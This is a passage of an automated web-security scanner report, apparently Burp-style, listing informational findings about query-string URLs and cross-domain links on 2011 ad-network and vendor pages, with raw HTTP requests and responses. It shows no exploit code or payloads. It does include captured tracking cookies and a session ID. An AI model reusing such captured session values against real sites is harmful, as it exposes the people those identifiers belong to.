User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 14:44:36 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12782

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/25/dork/reflected-xss-dynamically-evaluated-expression-style-attribute-to-introduce-arbirary-javascript-shoppingnetsuitecom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DBuyMcAfeeNow.com%26adT%3DMcAfee%25E2%2584%25A2%2BTotal%2BProtection%26adU%3Dwww.DailyTradeAlert.com%26adT%3D9%2BBest%2BStocks%2Bto%2BOwn%2BNow%26adU%3Dwww.obs-innovation.com%26adT%3DFree%2BDocument%2BWhite%2BPaper%26gl%3DUS&usg=AFQjCNHr3R-N75W0VvPU4CVjLvuDguH5Hg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

22.27. http://googleads.g.doubleclick.net/pagead/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/ads

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303751219&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F25%2Fdork%2Freflected-xss-cross-site-scripting-cwe-79-capec-86-ghdb-stillsecurecom.html&dt=1303733219665&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303733219698&frm=0&adk=1607234649&ga_vid=1085746718.1303733220&ga_sid=1303733220&ga_hid=111301468&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1018&bih=978&fu=0&ifi=1&dtd=273&xpc=aa0CcXN9Yi&p=file%3A//

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png
http://pagead2.googlesyndication.com/pagead/images/i.png
http://pagead2.googlesyndication.com/pagead/js/abg.js
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/25/dork/reflected-xss-cross-site-scripting-cwe-79-capec-86-ghdb-stillsecurecom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.eEye.com/Free-Scanner/%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNHCmAmNDJ1ozxP3Mf5vXQDJFH30_g

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303751219&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F25%2Fdork%2Freflected-xss-cross-site-scripting-cwe-79-capec-86-ghdb-stillsecurecom.html&dt=1303733219665&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303733219698&frm=0&adk=1607234649&ga_vid=1085746718.1303733220&ga_sid=1303733220&ga_hid=111301468&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1018&bih=978&fu=0&ifi=1&dtd=273&xpc=aa0CcXN9Yi&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 12:06:50 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4436

<html><head><style></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/25/dork/reflected-xss-cross-site-scripting-cwe-79-capec-86-ghdb-stillsecurecom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.eEye.com/Free-Scanner/%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNHCmAmNDJ1ozxP3Mf5vXQDJFH30_g" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

22.28. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1072501689/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://googleads.g.doubleclick.net
Path:	/pagead/viewthroughconversion/1072501689/

Issue detail

The page was loaded from a URL containing a query string:

http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1072501689/?random=1303733542110&cv=6&fst=1303733542110&num=1&fmt=1&value=1&label=pageview&bg=FFFFFF&hl=en&gl=US&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=3&u_tz=-300&u_java=true&u_nplug=9&u_nmime=44&ref=http%3A//www.manageengine.com/products/security-manager/store.html&url=http%3A//www.manageengine.com/products/security-manager/download.html&ctc_id=CAEVAQAAAB0BAAAA&ct_cookie_present=true

The response contains the following link to another domain:

https://services.google.com/sitestats/en.html?cid=1072501689

Request

GET /pagead/viewthroughconversion/1072501689/?random=1303733542110&cv=6&fst=1303733542110&num=1&fmt=1&value=1&label=pageview&bg=FFFFFF&hl=en&gl=US&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_his=3&u_tz=-300&u_java=true&u_nplug=9&u_nmime=44&ref=http%3A//www.manageengine.com/products/security-manager/store.html&url=http%3A//www.manageengine.com/products/security-manager/download.html&ctc_id=CAEVAQAAAB0BAAAA&ct_cookie_present=true HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.manageengine.com/products/security-manager/download.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Mon, 25 Apr 2011 12:12:13 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Content-Length: 378

<html><body bgcolor="#ffffff" link="#000000" alink="#000000" vlink="#000000" leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><center><font style="font-size:11px" face="arial,sans-serif" color="#000000">Google Site Stats - <a href="https://services.google.com/sitestats/en.html?cid=1072501689" target="_blank">learn more</a>
...[SNIP]...

22.29. http://ib.adnxs.com/ab previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ab

Issue detail

The page was loaded from a URL containing a query string:

http://ib.adnxs.com/ab?enc=4XoUrkfhFEDhehSuR-EUQAAAAMDMzABA4XoUrkfhFEDhehSuR-EUQICU8FEmC1Z8SsYda6b2ziU-g7VNAAAAAIAeAQC1AAAAlgIAAAIAAADHpAIA0WMAAAEAAABVU0QAVVNEACwB-gA3CRQE4ggBAgUCAAMAAAAAHSOBcgAAAAA.&tt_code=livejournal.com&udj=uf%28%27a%27%2C+9797%2C+1303741246%29%3Buf%28%27c%27%2C+47580%2C+1303741246%29%3Buf%28%27r%27%2C+173255%2C+1303741246%29%3Bppv%288991%2C+%278959360767911564416%27%2C+1303741246%2C+1303784446%2C+47580%2C+25553%29%3B&cnd=!wA_Htwjc8wIQx8kKGAAg0ccBKJQIMQAAALxH4RRAQgoIABAAGAAgASgBQgsIn0YQABgAIAMoAUILCJ9GEAAYACACKAFIAVAAWLcSYABolgU.&referrer=http://www.livejournal.com/&pp=TbWDPgACKZsK5XeQflcean0rg75a9lJ4uX93wQ&pubclick=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBJSjBPoO1TZvTCJDvlQfqvNzyB9fq-NMBl6GU7BiXn6ezIQAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00NDU2MTgyMTM1OTU2OTc0oAHD8v3sA7IBE3d3dy5saXZlam91cm5hbC5jb226AQozMDB4MjUwX2FzyAEJ2gEbaHR0cDovL3d3dy5saXZlam91cm5hbC5jb20vmAKIJ8ACBMgChdLPCuACAOoCGjU2NTUvbGouaG9tZXBhZ2UvbG9nZ2Vkb3V0qAMB6AP4A_UDCACAhOAEAYAG6cSF9MWQ1oky%26num%3D1%26sig%3DAGiWqtxmq8nW3CGfJ8RQnem9Ve-Gn6Ps_g%26client%3Dca-pub-4456182135956974%26adurl%3D

The response contains the following link to another domain:

http://apnxscm.ac3.msn.com:81/CACMSH.ashx?&t=1

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 26-Apr-2011 14:20:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 14:20:47 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 14:20:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7DHErkX00s]#%2L_'x%SEV/i#-(K4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`?^BL$+7#i$pT[s3jed7tfA1`pEJi?I'cetE@w$C=m_FErWsLkh?FBhA1/nWX9nBJjakYDtOsm*%>P1iWYn<C566r^)=`aZspsOeXr[Az(5mYHslaBH24%8e!G9^o8qHu1d<wou'>X:8EqWdzVt2pM8f4+c0KOudMU-dso-!sL8GKjFFV)#59[MNNPUYSv$Nw]68]%Y4DA:6p(K:kXc3s6r=0S6u_D96a?e(y#41L9al82/B^9JOJNhAmivW-R#3@lZ'D<[DQE!2V#^M^'oM=E]2j]yUTqG`bWR!yb-mQiJH(KxkF9(^4Z[?Rks(K9>2.t`@]S#.Pi-s@M.gKfz]>NjwEsq(Q8!6Gfbik=DN; path=/; expires=Sun, 24-Jul-2011 14:20:47 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 25 Apr 2011 14:20:47 GMT
Content-Length: 1454

document.write('<scr' + 'ipt language=\"Javascript\"><!--\n amgdgt_p=\"5112\";\n amgdgt_pl=\"bad56300\"; \n amgdgt_t = \"i\";\n amgdgt_clkurl = \"http://ib.adnxs.com/click/AAAAAAAAFEAAAAAAAAAUQAAA
...[SNIP]...
</noscript>\n');document.write('<img src="http://apnxscm.ac3.msn.com:81/CACMSH.ashx?&t=1" width="1" height="1"/>');

22.30. http://ib.adnxs.com/ab previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ab

Issue detail

The page was loaded from a URL containing a query string:

http://ib.adnxs.com/ab?enc=zczMzMzMCEDNzMzMzMwIQAAAAMDMzAhAzczMzMzMCEDNzMzMzMwIQOtg8QHzcr0bSsYda6b2ziUhg7VNAAAAAC8hAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAJ_Ck8AhwQBAgUCAAQAAAAArylOPgAAAAA.&tt_code=vert-105&udj=uf%28%27a%27%2C+9797%2C+1303741217%29%3Buf%28%27c%27%2C+45814%2C+1303741217%29%3Buf%28%27r%27%2C+173254%2C+1303741217%29%3Bppv%288991%2C+%271998880197657583851%27%2C+1303741217%2C+1303784417%2C+45814%2C+25553%29%3B&cnd=!0xVmYQj25QIQxskKGAAg0ccBKE8xAAAAwMzMCEBCEwgAEAAYACABKP7__________wFIAFAAWP8UYABolgU.&referrer=http://games.webalta.ru/&pp=TbWDIAAIVuAK7GZH3ItXr3JmF2XbbmiM84zMSQ&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB2DbrIIO1TeCtIcfMsQevr63kDdfq-NMBn6CU7BjbxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0xMTM0ODIyNjgyNTEwODc5oAHD8v3sA7IBEGdhbWVzLndlYmFsdGEucnW6AQoxNjB4NjAwX2FzyAEJ2gEYaHR0cDovL2dhbWVzLndlYmFsdGEucnUvmALWEsACBMgChdLPCqgDAegDaegD1AfoA8EC9QMAAADEgAbot86qwY6yhtEB%26num%3D1%26sig%3DAGiWqtyp--SO2lIMceltajJwn2qFCTNn3A%26client%3Dca-pub-1134822682510879%26adurl%3D

The response contains the following link to another domain:

http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1

Request

GET /ab?enc=zczMzMzMCEDNzMzMzMwIQAAAAMDMzAhAzczMzMzMCEDNzMzMzMwIQOtg8QHzcr0bSsYda6b2ziUhg7VNAAAAAC8hAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAJ_Ck8AhwQBAgUCAAQAAAAArylOPgAAAAA.&tt_code=vert-105&udj=uf%28%27a%27%2C+9797%2C+1303741217%29%3Buf%28%27c%27%2C+45814%2C+1303741217%29%3Buf%28%27r%27%2C+173254%2C+1303741217%29%3Bppv%288991%2C+%271998880197657583851%27%2C+1303741217%2C+1303784417%2C+45814%2C+25553%29%3B&cnd=!0xVmYQj25QIQxskKGAAg0ccBKE8xAAAAwMzMCEBCEwgAEAAYACABKP7__________wFIAFAAWP8UYABolgU.&referrer=http://games.webalta.ru/&pp=TbWDIAAIVuAK7GZH3ItXr3JmF2XbbmiM84zMSQ&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB2DbrIIO1TeCtIcfMsQevr63kDdfq-NMBn6CU7BjbxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0xMTM0ODIyNjgyNTEwODc5oAHD8v3sA7IBEGdhbWVzLndlYmFsdGEucnW6AQoxNjB4NjAwX2FzyAEJ2gEYaHR0cDovL2dhbWVzLndlYmFsdGEucnUvmALWEsACBMgChdLPCqgDAegDaegD1AfoA8EC9QMAAADEgAbot86qwY6yhtEB%26num%3D1%26sig%3DAGiWqtyp--SO2lIMceltajJwn2qFCTNn3A%26client%3Dca-pub-1134822682510879%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG4S]gj[2<?0P(*AuB-u**g1:XIF9]EhzW()U9M1V)`B-9_(ygo7z0v4(^Nf$5@f1epA2Sw6La@%rmg/R-$1/uc>#?+!_/VvS?PF*yU-C4_rx!NEq)w+(RJbbKYr/.fmNX[=5u*'fkg>GB`St%p.uU(f#6kDukULq8/6Chj_YZn-BImfAMpaUTmN7bc#zzr0=8j3jr-Ma8ZQ96*Jn4c[MSbx7njQ]@5'@YHOv]@%<7Aq6u^k]-O]7X=1o.SL4qu$o)jqNzHS=TC4(9F1:<#$U]bx!=zjV%>biGH%bdq58FLtlq2:d$JgUh5$4Iot#6@4.4J[*tG':4rrG+c3fEC-3df(zv7VQ@s]44`jFA-UO$V13P'.UTvPWL@iN5yP*wBe_0S+@C*@L7VvSaWmx$R!Rcj1*R:>#h2<bHAYq9bP+EfQqhMvlCKL>_w7fS(X)h1Nww_5fdG`1qm>g6vDz?4Kjlnm+'z[>O[I?A2K@R'5'-#ByUV8APmF!5j^hik=DN

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 26-Apr-2011 14:22:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 14:22:47 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sun, 24-Jul-2011 14:22:47 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG5+^ErkX00s]#%2L_'x%SEV/i#-Z[4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`?^BL$+7#i$pT[s3jed7tfA1`pEJi?I'cetE@w$C=m_FErWsLkh?FBhA1/nWX9nBJjakYDtOsm*%>P1iWYn<C566r^)=`aZspsOeXr[Az(5mYHslaBH24%8e!G9^o8qHu1d<wou'>X:8EqWdzVt2pM8f4+c0KOudMU-dso-!sLMxu47t>^)Y[y26^eBmD'@zmWDj/tLAupNA/*ML[uTpu!RrSf1cs(^CZv.tI8q/xu`sW=OZ3z#PJuFGHh*`H$b4vufy:^]C?mQg'K(EMIZ@?3yp9wkpsQnoc@iD:G@#d0Fg7d]E7#M:pj)ZgW:5<tK-pBGD/hdLwyL8Xcmrl6eV=VdoO'kk?Y_l`vu; path=/; expires=Sun, 24-Jul-2011 14:22:47 GMT; domain=.adnxs.com; HttpOnly
Date: Mon, 25 Apr 2011 14:22:47 GMT
Content-Length: 1501

document.write('<scr' + 'ipt language=\"Javascript\"><!--\n amgdgt_p=\"5112\";\n amgdgt_pl=\"bca52e1b\"; \n amgdgt_t = \"i\";\n amgdgt_clkurl = \"http://ib.adnxs.com/click/H4XrUbgeA0AfhetRuB4DQAAA
...[SNIP]...
</noscript>');document.write('<iframe src="http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...

22.31. http://ideco-software.ru/products/ims/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ideco-software.ru
Path:	/products/ims/

Issue detail

The page was loaded from a URL containing a query string:

http://ideco-software.ru/products/ims/?utm_source=dir&utm_medium=cpc&utm_campaign=d1010_mail1&utm_term=mail_ics2&utm_content=10013

The response contains the following links to other domains:

http://bs.yandex.ru/resource/watch.js
http://bs.yandex.ru/watch/35648
http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://www.ideco-software.ru/products/onlineseminar08_nsd_20110421.html?fr=ban_sem20110419

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 14:35:59 GMT
Server: Microsoft-IIS/6.0
Connection: Close
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: dv=4/25/2011 6:35:59 PM; expires=Sun, 25-Apr-2021 14:35:59 GMT; path=/
Set-Cookie: Query=/products/ims/index.html?utm_source=dir&utm_medium=cpc&utm_campaign=d1010_mail1&utm_term=mail_ics2&utm_content=10013; expires=Sun, 25-Apr-2021 14:35:59 GMT; path=/
Set-Cookie: FirstVisit=4/25/2011 6:35:59 PM; expires=Sun, 25-Apr-2021 14:35:59 GMT; path=/
Set-Cookie: ASP.NET_SessionId=fkdyl055c3sg0uuma045oy45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=windows-1251
Content-Length: 21815

<html>
<head>
<script type="text/javascript" src="/dropmenu/jquery.js" />
</script>
<script type="text/javascript" src="/dropmenu/hmenu.js"
...[SNIP]...
<div>
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="611" height="167" wmode="opaque">
<param name="wmode" value="opaque" />
...[SNIP]...
<div class="name">
<a
href="http://www.ideco-software.ru/products/onlineseminar08_nsd_20110421.html?fr=ban_sem20110419">................. ...... Ideco ICS ... ...... ............ ......</a>
...[SNIP]...
</script>
<script src="http://bs.yandex.ru/resource/watch.js" type="text/javascript"></script>
<noscript>
<img src="http://bs.yandex.ru/watch/35648" border="0" width="1" height="1" alt="">
</noscript>
...[SNIP]...

22.32. http://js.dt00.net/public/smi/elastic/24.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://js.dt00.net
Path:	/public/smi/elastic/24.js

Issue detail

The page was loaded from a URL containing a query string:

http://js.dt00.net/public/smi/elastic/24.js?time=13

The response contains the following links to other domains:

http://mgpublications.com/news/1731
http://mgpublications.com/news/19679
http://mgpublications.com/news/20803
http://mgpublications.com/news/2192
http://mgpublications.com/news/2543
http://mgpublications.com/news/26548
http://mgpublications.com/news/26738
http://mgpublications.com/news/29388
http://mgpublications.com/news/30309
http://mgpublications.com/news/31765
http://mgpublications.com/news/34328
http://mgpublications.com/news/34333
http://mgpublications.com/news/36386
http://mgpublications.com/news/36534
http://mgpublications.com/news/36653
http://mgpublications.com/news/36661
http://mgpublications.com/news/37143
http://mgpublications.com/news/37192
http://mgpublications.com/news/37564
http://mgpublications.com/news/37570
http://mgpublications.com/news/37575
http://mgpublications.com/news/4489
http://mgpublications.com/news/4654
http://mgpublications.com/news/6218

Request

GET /public/smi/elastic/24.js?time=13 HTTP/1.1
Host: js.dt00.net
Proxy-Connection: keep-alive
Referer: http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:40:23 GMT
Content-Type: application/x-javascript
Content-Length: 12170
Last-Modified: Mon, 25 Apr 2011 14:30:01 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Expires: Wed, 25 May 2011 14:40:23 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

var mginformer = '<div class="box"> <ul class="smi-inf" id = "smi-informer"> <li> <a href="http://mgpublications.com/news/37575" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2011/04/2011042420080728-135026-5951-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/37575" target="_blank">.................., .................... .... .... ............ .. ..........!</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/37570" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2011/04/20110424880_news_223201-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/37570" target="_blank">........ .................. .............. .. ...................... .................... (........)</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/37564" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2011/04/201104241584-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/37564" target="_blank">............ ......................, ...... ...... ....................! </a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/36534" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2011/03/20110328vanga-15022011-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/36534" target="_blank">.......... ............ ................ ............ .... ........................ ..........?</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/37192" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2011/04/20110414126306301-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/37192" target="_blank">............ .............. .... ........ ............ .................... .......................... ............</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/26738" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2010/10/20101024lolita-370-10-11-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/26738" target="_blank">............ ................ .................. ............ .. .......... ............</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/30309" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://smiimg.dt00.net/smi/2010/12/20101218702558_3-75x75.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/30309" target="_blank">...... ...... .................... ........ ........ .................. (........)</a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/4654" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://imgn.dt00.net/320/320425_b.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/4654" target="_blank">........-............ ...... VIP-........... ...... .......... .............. ........ ........ ................ ....................... </a>
...[SNIP]...
<li> <a href="http://mgpublications.com/news/2192" target="_blank" class="smi-inf-img"><img width="75" height="75" src="http://imgn.dt00.net/200/200462_b.jpg">
...[SNIP]...
<div class="smi-inf-box"> <a href="http://mgpublications.com/news/2192" target="_blank">.................... .......... ................ ........: .......... .............................. ...... ........ .. ...................... ........!</a>
